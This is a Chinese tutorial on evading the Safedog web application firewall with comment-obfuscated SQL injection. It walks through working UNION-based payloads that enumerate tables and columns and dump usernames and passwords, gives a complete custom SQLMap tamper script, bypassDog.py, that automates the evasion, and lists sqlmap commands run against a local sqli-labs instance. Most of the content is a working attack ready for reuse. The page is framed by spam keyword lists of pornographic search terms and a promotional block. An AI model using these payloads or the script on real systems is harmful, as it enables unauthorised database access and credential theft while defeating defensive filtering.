日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区

您的位置:首頁技術文章
文章詳情頁

教你編寫SQLMap的Tamper腳本過狗

瀏覽:194日期:2023-03-06 14:25:43
目錄
  • 測試環境
  • 最新版某狗
  • 測試方法
  • bypass
    • and
    • order by
    • union select
    • 加個換行試試
    • 獲取表字段
    • 編寫tamper

測試環境

最新版某狗

測試方法

安全狗其實是比較好繞的WAF,繞過方法很多,但這里我們就用一種:注釋混淆

一招鮮吃遍天

注釋混淆,其實就是在敏感位置添加垃圾字符注釋,常用的垃圾字符有/、!、*、%

這里再解釋一下內聯注釋,因為后面要用到:

MySQL內聯注釋: /*!xxxxxxx*/ !后面的語句會當作SQL語句直接執行

但是如果!后面跟著MySQL版本號,那么就會出現兩種情況

!后面接的數據庫版本號小于自身版本號,就會將注釋中的內容執行當!后面接的數據庫版本號大于等于自身版本號,就會當做注釋來處理。

幫助網安學習,全套資料S信免費領取:
① 網安學習成長路徑思維導圖
② 60+網安經典常用工具包
③ 100+SRC分析報告
④ 150+網安攻防實戰技術電子書
⑤ 最權威CISSP 認證考試指南+題庫
⑥ 超1800頁CTF實戰技巧手冊
⑦ 最新網安大廠面試題合集(含答案)
⑧ APP客戶端安全檢測指南(安卓+IOS)

數據庫版本號以五位數字表示,比如當前環境下數據庫版本號表示為:50553

!后面接小于50553的:

執行了select 1;

!后面接大于等于50553的:

執行了 select ;

下面進入正題

bypass

and

and 1=1

但是把空格刪掉就不攔了

所以,我們認為,and后面不能直接跟空格…

那么如果用其他形式表示空格呢?

前面說了,我們這次只使用注釋混淆:

burp,抓包設置

長度5335是被攔截的

長度為899的說明成功繞過

我們選擇其中一個作為空格的替代者就好了,這里我們選擇/*%*

即: ->/*/*%**/

同理 ,or是一樣的:

order by

測試發現還是只要替換order by中間的空格就可以了,所以繞過方法和前面一樣:

union select

union select使用之前的垃圾字符替換空格發現不行了:

但是先不急于換方法,再爆破一遍試試:

發現又有很多可以繞過的了。

所以我們再更改一下替換空格的垃圾字符, 這里選/*/!%!/*/

即: ->/*/!%!/*/

獲得當前數據庫

正常語句:

?id=-1 union select 1,database(),3 --+

繞過:

即:()->(/*/!%!/*/)

獲取數據庫中的表

正常語句:

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" --+

繞過:

經過測試發現攔截的是select + from + information_schema的組合

中間加垃圾字符替換空格已經不管用了,我們嘗試對關鍵字進行混淆。

information_schema進行混淆測試:

首先使用內聯注釋,發現,這里的版本號不管寫啥,都直接被攔。

考慮是檢測了select + from + /*! + information_schema的組合

加個換行試試

還是不行…

那既然都換行了,那我們再在換行前加一些垃圾字符:

如果我們直接插入垃圾字符,會當作SQL語句執行,所以前面還需要在垃圾字符前加個注釋,可以是 /**/#--+

但是經過測試只有 --+好用

有這么多可以繞過的,我們隨便選擇一個,比如/*%/

這樣,最終語句如下:

?id=-1/*/!%!/*/union/*/!%!/*/select/*/!%!/*/1,group_concat(table_name),3/*/!%!/*/from/*/!%!/*//*!00000--+/*%/%0ainformation_schema.tables*/%20where%20table_schema=database(/*/!%!/*/)--%20+

獲取表字段

正常語句:

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" --+

繞過語句:

?id=-1/*/!%!/*/union/*/!%!/*/select/*/!%!/*/1,group_concat(column_name),3/*/!%!/*/from/*/!%!/*//*!00000--+/*%/%0ainformation_schema.columns*/%20where%20table_name=0x7573657273--%20+

獲取字段信息

?id=-1/*/!%!/*/union/*/!%!/*/select/*/!%!/*/1,/*/!%!/*/group_concat(username,0x2f,password),3/*/!%!/*/from/*/!%!/*/users

成功。

編寫tamper

當我們下載了SQLMap,解壓后,我們可以找到文件夾【tamper】,該文件夾有很多個Tamper腳本幫助我們繞過一些安全防護:

網上有很多相關腳本的介紹,我就不一一介紹了。

雖然SQLMap提供了這么多的Tamper腳本,但是在實際使用的過程中,網站的安全防護并沒有那么簡單,可能過濾了許多敏感的字符以及相關的函數。這個時候就需要我們針對目標的防護體系構建相應的Tamper腳本。

Tamper相當于一個加工車間,它會把我們的Payload進行加工之后發往目標網站。

我們隨便打開一個Tamper腳本看一下它的結構:

#apostrophemask.py#!/usr/bin/env python"""Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)See the file "LICENSE" for copying permission"""# 導入SQLMap中lib\core\enums中的PRIORITY優先級函數from lib.core.enums import PRIORITY# 定義腳本優先級__priority__ = PRIORITY.LOWEST# 對當前腳本的介紹def dependencies():    pass"""對傳進來的payload進行修改并返回函數有兩個參數。主要更改的是payload參數,kwargs參數用得不多。"""def tamper(payload, **kwargs):    """    Replaces apostrophe character (") with its UTF-8 full width counterpart (e.g. " -> %EF%BC%87)    References:* http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128* https://web.archive.org/web/20130614183121/http://lukasz.pilorz.net/testy/unicode_conversion/* https://web.archive.org/web/20131121094431/sla.ckers.org/forum/read.php?13,11562,11850* https://web.archive.org/web/20070624194958/http://lukasz.pilorz.net/testy/full_width_utf/index.phps    >>> tamper("1 AND "1"="1")    "1 AND %EF%BC%871%EF%BC%87=%EF%BC%871"    """    return payload.replace("\"", "%EF%BC%87") if payload else payload

可見Tamper腳本的結構非常簡單,其實滲透測試中的主要難點還是如何去繞過WAF。

下面我們針對bypass部分的繞過方法進行編寫Tamper腳本,來實現自動化SQL注入:

實際測試的時候發現,sqlmap默認語句中的AS關鍵字也會被攔截,這里也用同樣的方法替換一下就好

#!/usr/bin/env pythonimport refrom lib.core.settings import UNICODE_ENCODINGfrom lib.core.enums import PRIORITY__priority__ = PRIORITY.NORMALdef dependencies():    passdef tamper(payload, **kwargs):    if payload:payload = payload.replace(" ","/*/!%!/*/")payload = payload.replace("()","(/*/!%!/*/)")payload = re.sub(r"(?i)(INFORMATION_SCHEMA.SCHEMATA)",r"/*!00000--%20/*%/%0aINFORMATION_SCHEMA.SCHEMATA*/",payload)payload = re.sub(r"(?i)(INFORMATION_SCHEMA.TABLES)",r"/*!00000--%20/*%/%0aINFORMATION_SCHEMA.TABLES*/",payload)payload = re.sub(r"(?i)(INFORMATION_SCHEMA.COLUMNS)",r"/*!00000--%20/*%/%0aINFORMATION_SCHEMA.COLUMNS*/",payload)payload = re.sub(r"(?i)(/AS/)",r"http://*!00000--%20/*%/%0aAS*//",payload)    return payload

測試:

sqlmap.py -u "http://192.168.13.131/sqli-labs/Less-2/?id=1" --tamper "bypassDog.py" --proxy "http://127.0.0.1:8080/" --fresh-queries --random-agent

sqlmap.py -u "http://192.168.13.131/sqli-labs/Less-2/?id=1" --tamper "bypassDog.py" --proxy "http://127.0.0.1:8080/" --fresh-queries --random-agent --dbs
sqlmap.py -u "http://192.168.13.131/sqli-labs/Less-2/?id=1" --tamper "bypassDog.py" --proxy "http://127.0.0.1:8080/" --fresh-queries --random-agent -D security --tables

python2 sqlmap.py -u "http://192.168.13.131/sqli-labs/Less-2/?id=1" --tamper "bypassDog.py" --proxy "http://127.0.0.1:8080/" --fresh-queries --random-agent -D security -T users --columns

sqlmap.py -u "http://192.168.13.131/sqli-labs/Less-2/?id=1" --tamper "bypassDog.py" --proxy "http://127.0.0.1:8080/" --fresh-queries --random-agent -D security -T users -C username,password --dump --stop 3

到此這篇關于教你編寫SQLMap的Tamper腳本過狗的文章就介紹到這了,更多相關SQLMap的Tamper腳本內容請搜索以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持!

標簽: MsSQL
日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区
中文在线资源| 水蜜桃久久夜色精品一区的特点| 亚洲一区日本| 欧美va亚洲va日韩∨a综合色| 99国产精品一区二区| 久久精选视频| 亚洲性色视频| 樱桃成人精品视频在线播放| 欧美日韩视频| 噜噜噜躁狠狠躁狠狠精品视频 | 亚洲精品永久免费视频| 91欧美日韩| 久久国产主播| 99国产精品久久久久久久成人热 | 欧美日一区二区| 午夜视频精品| 亚洲另类av| 麻豆精品一区二区综合av| 久久爱www成人| 亚洲午夜在线| 亚洲一区二区三区四区电影 | 欧美精品自拍| 高清久久一区| 日韩不卡一二三区| 免费在线日韩av| 久久精品三级| 久久久久久免费视频| 午夜欧美在线| 一区二区三区网站| 国产精品自拍区| 成人av三级| 黄页网站一区| 亚州av日韩av| 精品国产一区二| 国内精品美女在线观看| 日韩精品免费一区二区三区| 视频一区视频二区中文字幕| 欧美久久亚洲| 久久裸体视频| 日本综合视频| 日本蜜桃在线观看视频| 免费欧美日韩| 欧美激情在线精品一区二区三区| 亚洲精品在线影院| 免费久久99精品国产自在现线| 日韩在线卡一卡二| 国产一区二区三区四区大秀| 国产精品中文字幕制服诱惑| 亚洲欧洲一区二区天堂久久| 久久亚洲国产| 青青伊人久久| 成人欧美一区二区三区的电影| 欧美日韩一区二区国产 | 在线综合视频| 三级小说欧洲区亚洲区| 激情丁香综合| 日韩一区欧美二区| 精品丝袜在线| 国产字幕视频一区二区| 蜜桃av一区二区在线观看| 青青青免费在线视频| 久久精品欧洲| 久久国产欧美日韩精品| 91精品国产经典在线观看| 91亚洲精品在看在线观看高清| 久久国产免费看| 久久亚洲欧美| 久久久国产精品网站| 喷白浆一区二区| 国产精品毛片aⅴ一区二区三区| 亚洲91久久| 亚洲免费成人av在线| 日韩成人综合| 中文亚洲免费| 成人午夜亚洲| 香蕉久久久久久| 久久久久久久久久久妇女| 亚洲一区国产| 久久久久久婷| 国产精品视频一区视频二区| 国产一区二区三区天码| 亚洲精品伊人| 日韩av片子| 久久狠狠婷婷| 亚洲色图国产| 国产 日韩 欧美一区| 日韩精品一二区| 亚洲精品影视| 午夜av一区| 91视频一区| 久久国产欧美日韩精品| 久久亚洲欧洲| 日韩免费av| 国产一区二区三区不卡视频网站| 久久国产生活片100| 亚洲无线观看| 伊人成人网在线看| 久久久噜噜噜| 91欧美国产| 国产96在线亚洲| 国产精品2023| 国产欧美日韩在线一区二区| 日本v片在线高清不卡在线观看| 久久国产精品久久w女人spa| 91成人精品| 欧美特黄一级大片| 日韩免费福利视频| 国产精品密蕾丝视频下载| 日本成人精品| 日韩av一级片| 蜜臀精品一区二区三区在线观看| 免费在线观看日韩欧美| 国产乱论精品| 日本91福利区| 国产日韩亚洲| 免费在线看一区| 日韩av资源网| 国产精品伦一区二区| 国产精品第十页| 欧美丰满日韩| 久久午夜影院| 老司机精品在线| 亚洲免费福利一区| 亚洲精品少妇| 日韩不卡免费视频| 国产一卡不卡| 久久三级中文| 四虎8848精品成人免费网站| 国产91在线播放精品| 神马久久午夜| 91精品婷婷色在线观看| 免费黄色成人| 久久国产精品99国产| 亚洲日本欧美| 国产日本精品| 黄色网一区二区| 成人日韩在线观看| 美女少妇全过程你懂的久久| 欧美特黄一级| 亚洲人妖在线| 国产精品sm| 日韩中文影院| 免费日韩视频| 日本少妇一区二区| 九九99久久精品在免费线bt| 精品捆绑调教一区二区三区| 欧美日韩国产在线一区| 亚洲精品成人一区| 国产精品极品国产中出| 首页国产精品| 性色一区二区| 国产精品扒开腿做爽爽爽软件| 色爱综合网欧美| 国产精品7m凸凹视频分类| 亚洲三级av| 精品视频高潮| 九色精品91| 91福利精品在线观看| 国产一区精品福利| 免费视频亚洲| 欧美日韩亚洲一区三区| 91亚洲成人| 亚洲一区区二区| 国产精品久久久免费| 91精品一区二区三区综合在线爱 | 精品一区二区三区中文字幕| 久久蜜桃精品| 免费观看在线综合| 欧美国产极品| av亚洲免费| 欧美有码在线| 久久青草久久| 偷拍亚洲精品| 国产一区二区三区不卡视频网站| 久久美女性网| 神马午夜在线视频| 日韩不卡视频在线观看| 婷婷成人在线| 久久精品国产68国产精品亚洲| 精品国产鲁一鲁****| 亚洲免费福利| 婷婷五月色综合香五月| 免费亚洲婷婷| 欧美激情三区| 成人一区而且| 日韩电影在线视频| 日韩中文字幕视频网| 九九久久电影| 国产精品99一区二区三区| 国产私拍福利精品视频二区| 国产亚洲精品v| 高清久久一区| 色老板在线视频一区二区| 欧美激情麻豆| 国产精品久久久久久久久久妞妞 | 视频一区二区欧美| 天堂俺去俺来也www久久婷婷| 88xx成人免费观看视频库| 国产精品theporn| 亚洲a级精品|